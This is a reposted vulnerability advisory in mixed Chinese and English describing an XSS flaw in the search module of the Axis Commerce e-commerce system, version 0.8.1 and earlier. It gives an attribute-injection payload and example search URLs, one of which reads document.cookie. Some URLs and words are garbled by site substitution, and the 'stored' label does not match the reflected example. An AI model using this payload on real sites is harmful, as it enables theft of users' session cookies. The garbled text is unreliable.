标题: Axis Commerce (E-Commerce System) Stored XSS 作者: Eyup CELIK 下载地址: https://github测试数据/downloads/axis/axiscommerce/axis-0.8.1.zip 已测试版本: 0.8.1 and previus 测试平台: Apache (For Windows) ISSUE Vulnerable Modules => Search Module XSS can be done using the command input 示例 Code: " onmouseover=prompt(XSS Code) bad=" 示例: http://HdhCmsTest2cto测试数据 /axis-0.7.0.4/search/result?q="onmouseover=prompt(906764) bad=" http://HdhCmsTest2cto测试数据 /axis-0.7.0.4/search/result?q="onmou seo ver=prompt(document.cookie) bad=" 修复:
过滤
查看更多关于Axis Commerce (E-Commerce System)存储型XSS - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11499